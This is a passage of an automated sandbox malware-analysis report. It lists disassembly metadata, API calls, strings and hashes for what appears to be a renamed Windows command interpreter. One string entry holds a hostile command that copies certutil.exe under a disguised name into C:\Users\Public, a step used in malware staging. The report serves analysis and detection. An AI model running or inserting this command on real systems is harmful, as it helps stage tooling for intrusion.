                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcsicmp$iswspacewcschr
                                                                                          • String ID: ;$=,;$FOR$FOR/?$IF/?$REM$REM/?
                                                                                          • API String ID: 840959033-3627297882
                                                                                          • Opcode ID: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                                                                          • Instruction ID: 9633db1d19626e4e8b65e16510926acfdc952699339b0f592cc5a6b19004c3fc
                                                                                          • Opcode Fuzzy Hash: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                                                                          • Instruction Fuzzy Hash: C0D18E71E0F643A6FB50AF61E8052B967A0FF84B45F548035DA4EC63A6DF3CE449A350
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                           • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcsicmp$EnvironmentVariable
                                                                                          • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
                                                                                          • API String ID: 198002717-267741548
                                                                                          • Opcode ID: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                                                                          • Instruction ID: c78d0d15625e80731e17bca26b3e1a511129ff6a7212e1e560c4dfcade4ff1ef
                                                                                          • Opcode Fuzzy Hash: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                                                                          • Instruction Fuzzy Hash: 83517075A0E743A6F6549B21B810279ABA1FF8EB81F54A035D90EC3795DF3CE448E350
                                                                                          APIs
                                                                                          • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF6A0E7E626,?,?,00000000,00007FF6A0E81F69), ref: 00007FF6A0E7F000
                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF6A0E81F69,?,?,?,?,?,?,?,00007FF6A0E7286E,00000000,00000000,00000000,00000000), ref: 00007FF6A0E7F031
                                                                                          • iswdigit.MSVCRT(?,?,00000000,00007FF6A0E81F69,?,?,?,?,?,?,?,00007FF6A0E7286E,00000000,00000000,00000000,00000000), ref: 00007FF6A0E7F0D6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                           • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: iswdigitiswspacewcschr
                                                                                          • String ID: ()|&=,;"$=,;$Ungetting: '%s'
                                                                                          • API String ID: 1595556998-2755026540
                                                                                          • Opcode ID: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                                                                                          • Instruction ID: 6fac5bdaea5f666f300459ca93e8b35bbef114a2087111a5e141771f52a9c52f
                                                                                          • Opcode Fuzzy Hash: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                                                                                          • Instruction Fuzzy Hash: ED22CA75E0F693F1FA608B25A84427A66A0BF45791F908136DA9DC23E7DF3CE421B710
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                           • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$Processwcschr$Alloc$Sizeiswspace
                                                                                          • String ID: "$=,;
                                                                                          • API String ID: 3545743878-4143597401
                                                                                          • Opcode ID: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
                                                                                          • Instruction ID: 6262cb64aade58d12a0299e44f83260929dae7ccf1cc1e5f645a3222300ab161
                                                                                          • Opcode Fuzzy Hash: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
                                                                                          • Instruction Fuzzy Hash: DFC1AD72E0E693A2EB695B1194003B9B6B1FF49F55F199036DE4EC3395EF3CA845E200
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                           • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentFormatMessageThread
                                                                                          • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                                                                                          • API String ID: 2411632146-3173542853
                                                                                          • Opcode ID: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                                                                                          • Instruction ID: 18596935f4268320b9beef1e0f1717c81bfb67f3da4685b0e89397bf9f51f5f2
                                                                                          • Opcode Fuzzy Hash: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                                                                                          • Instruction Fuzzy Hash: 12616BB2E0A783E1EA64DF61A4045B9A3A0FF48BC4F54413AEE4D87758DF3DE641A700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                           • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateFile_open_osfhandle
                                                                                          • String ID: con
                                                                                          • API String ID: 2905481843-4257191772
                                                                                          • Opcode ID: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                                                                          • Instruction ID: a5cc2c68f7c4a0a354af6f3cb010ed8b2ca08e54f06bff4076ec8556f8bf9fa5
                                                                                          • Opcode Fuzzy Hash: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                                                                          • Instruction Fuzzy Hash: 1371D732A09783AAE7608F25E440379BAA0FB8AB61F544235DE5E837D4DF3DD449DB00
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                           • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: ConsoleMode$Handle$wcsrchr$CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailureiswspacewcschr
                                                                                          • String ID:
                                                                                          • API String ID: 3829876242-3916222277
                                                                                          • Opcode ID: a065431fe6af81354ef476bd10952e9750a3a50c047aab405a5f97467c5f577a
                                                                                          • Instruction ID: 922c2d36a5b40b99f133e9bab17b101a1703867f0a5d5c1b846cbc4793c4ff3b
                                                                                          • Opcode Fuzzy Hash: a065431fe6af81354ef476bd10952e9750a3a50c047aab405a5f97467c5f577a
                                                                                          • Instruction Fuzzy Hash: 09619E36A0A643A7EB159B25E40027EBBA1FFC9B95F458134DE0E87795DF3CE8059B00
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                           • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
                                                                                          • String ID: CSVFS$NTFS$REFS
                                                                                          • API String ID: 3510147486-2605508654
                                                                                          • Opcode ID: 25656f9dd7156011cddd26e1f63935c756ad3329fe6ff4f37f6319205113c483
                                                                                          • Instruction ID: fc4b2b160720abcf1be9745864870076e2d65204565402049c1c2a1423b7bad6
                                                                                          • Opcode Fuzzy Hash: 25656f9dd7156011cddd26e1f63935c756ad3329fe6ff4f37f6319205113c483
                                                                                          • Instruction Fuzzy Hash: C461703270ABC29AEB658F21D8443E9B7B4FB49B86F544075DA0E8B758DF38D604D700
                                                                                          APIs
                                                                                          • longjmp.MSVCRT(?,00000000,00000000,00007FF6A0E77279,?,?,?,?,?,00007FF6A0E7BFA9), ref: 00007FF6A0E94485
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                           • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: longjmp
                                                                                          • String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
                                                                                          • API String ID: 1832741078-366822981
                                                                                          • Opcode ID: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                                                                          • Instruction ID: 46adebd2932164752c91021a6d51237f9f625cf8d54a58a4cf51552df28558fb
                                                                                          • Opcode Fuzzy Hash: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                                                                          • Instruction Fuzzy Hash: F2C171B1F0E643B2E624DB565584AB867E1BB4ABC5FA14036DD0DD3792CF2CA446B380
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF6A0E7CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E7B9A1,?,?,?,?,00007FF6A0E7D81A), ref: 00007FF6A0E7CDA6
                                                                                            • Part of subcall function 00007FF6A0E7CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E7B9A1,?,?,?,?,00007FF6A0E7D81A), ref: 00007FF6A0E7CDBD
                                                                                          • memset.MSVCRT ref: 00007FF6A0E7BA2B
                                                                                          • wcschr.MSVCRT ref: 00007FF6A0E7BA8A
                                                                                          • wcschr.MSVCRT ref: 00007FF6A0E7BAAA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                           • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heapwcschr$AllocProcessmemset
                                                                                          • String ID: -$:.\$=,;$=,;+/[] "
                                                                                          • API String ID: 2872855111-969133440
                                                                                          • Opcode ID: e048727378a3460f555082e81c55544313692faeaf2a868744a414ec58a8adda
                                                                                          • Instruction ID: 0c5c964d48b15df265e6e80df794b71225244cbdc0c6a0c6b7949b69ec4c697d
                                                                                          • Opcode Fuzzy Hash: e048727378a3460f555082e81c55544313692faeaf2a868744a414ec58a8adda
                                                                                          • Instruction Fuzzy Hash: 8CB19132A0EA83A1EA709B15A48437966A0FF89B80F954235DE5EC3795DF3CE845A300
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: longjmp$Heap$AllocByteCharMultiProcessWidememmovememset
                                                                                          • String ID: 0123456789$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                          • API String ID: 1606811317-2340392073
                                                                                          • Opcode ID: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                                                                          • Instruction ID: 5c8d1bc77561c43ea53cf63bca57bcdfea16dccb85cb9d0fa7f74e860e2573b9
                                                                                          • Opcode Fuzzy Hash: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                                                                          • Instruction Fuzzy Hash: 7CD1BF31E0AB43A2EB518B24A8442B977A0FF857A0F948132DE5D977E6DF3CE415E700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$ErrorLast$InformationVolume
                                                                                          • String ID: %04X-%04X$~
                                                                                          • API String ID: 2748242238-2468825380
                                                                                          • Opcode ID: 527acd2d5873e217b6583c2a0f855b60256f074d3be57f79744cf5756af0c24e
                                                                                          • Instruction ID: 008b9d5dce13b29e5005fd27a069eb49598c20a82f861780ef87f6ed9a3e74c1
                                                                                          • Opcode Fuzzy Hash: 527acd2d5873e217b6583c2a0f855b60256f074d3be57f79744cf5756af0c24e
                                                                                          • Instruction Fuzzy Hash: E1A1AF32709BC2AAEB658F2198502E977A1FB89789F508035DA4D8BB89DF3CD645D700
                                                                                          APIs
                                                                                          • wcschr.MSVCRT(?,?,?,?,?,?,?,00007FF6A0E86570,?,?,?,?,?,?,00000000,00007FF6A0E86488), ref: 00007FF6A0E86677
                                                                                          • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF6A0E86570,?,?,?,?,?,?,00000000,00007FF6A0E86488), ref: 00007FF6A0E8668F
                                                                                          • _errno.MSVCRT ref: 00007FF6A0E866A3
                                                                                          • wcstol.MSVCRT ref: 00007FF6A0E866C4
                                                                                          • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF6A0E86570,?,?,?,?,?,?,00000000,00007FF6A0E86488), ref: 00007FF6A0E866E4
                                                                                          • iswalpha.MSVCRT(?,?,?,?,?,?,?,00007FF6A0E86570,?,?,?,?,?,?,00000000,00007FF6A0E86488), ref: 00007FF6A0E866FE
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: iswdigit$_errnoiswalphawcschrwcstol
                                                                                          • String ID: +-~!$APerformUnaryOperation: '%c'
                                                                                          • API String ID: 2348642995-441775793
                                                                                          • Opcode ID: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                                                                          • Instruction ID: d18f7c49df57238008a06f6855a3e652e31171f370983c6ac220e12c435cea87
                                                                                          • Opcode Fuzzy Hash: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                                                                          • Instruction Fuzzy Hash: 47717A72D0AA87A6E7605F21D45017DB7A0FB89F89F54C032DA4E86394EF3DE488E750
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$ErrorInformationLastVolume_wcsicmptowupper
                                                                                          • String ID: FAT$~
                                                                                          • API String ID: 2238823677-1832570214
                                                                                          • Opcode ID: 9870e3df3003cca21a2b5bb6f1f08ea82d43fbeeb1162d01b560e5e2cc2d055c
                                                                                          • Instruction ID: 242d43b1cfb7728628448e68fcd068f145db755f7c70d8b2fde9055fa5562ba8
                                                                                          • Opcode Fuzzy Hash: 9870e3df3003cca21a2b5bb6f1f08ea82d43fbeeb1162d01b560e5e2cc2d055c
                                                                                          • Instruction Fuzzy Hash: 6371913270ABC2AAEB61CF20D8502E977A4FB49785F448135DA4D8BB59DF3CD649D700
                                                                                          APIs
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF6A0E7FE2A), ref: 00007FF6A0E7D884
                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF6A0E7FE2A), ref: 00007FF6A0E7D89D
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF6A0E7FE2A), ref: 00007FF6A0E7D94D
                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF6A0E7FE2A), ref: 00007FF6A0E7D964
                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF6A0E7DB89
                                                                                          • wcstol.MSVCRT ref: 00007FF6A0E7DBDF
                                                                                          • wcstol.MSVCRT ref: 00007FF6A0E7DC63
                                                                                          • memmove.MSVCRT ref: 00007FF6A0E7DD33
                                                                                          • memmove.MSVCRT ref: 00007FF6A0E7DE9A
                                                                                          • longjmp.MSVCRT(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF6A0E7FE2A), ref: 00007FF6A0E7DF1F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$AllocProcessmemmovewcstol$_wcsnicmplongjmp
                                                                                          • String ID:
                                                                                          • API String ID: 1051989028-0
                                                                                          • Opcode ID: 64565f03666b4bb772596797247e6bb6fdde89d50adaa5f7e3853eb5f84ddd48
                                                                                          • Instruction ID: d330437aa47cc70a5640651e8164d5cb7ec664ed0ec48994ed076a8013fe333a
                                                                                          • Opcode Fuzzy Hash: 64565f03666b4bb772596797247e6bb6fdde89d50adaa5f7e3853eb5f84ddd48
                                                                                          • Instruction Fuzzy Hash: D6029F32A0EB83A2EA249F15E44027AB6B0FB85B94F544231DA9EC7795DF7CE451E700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
